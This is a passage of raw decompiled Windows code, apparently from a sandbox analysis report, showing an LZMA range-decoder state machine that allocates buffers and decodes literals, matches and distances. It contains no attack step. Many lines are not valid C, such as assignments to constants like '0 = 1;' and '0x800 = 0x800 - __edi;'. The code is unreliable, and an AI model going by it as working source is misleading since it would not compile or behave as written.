								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
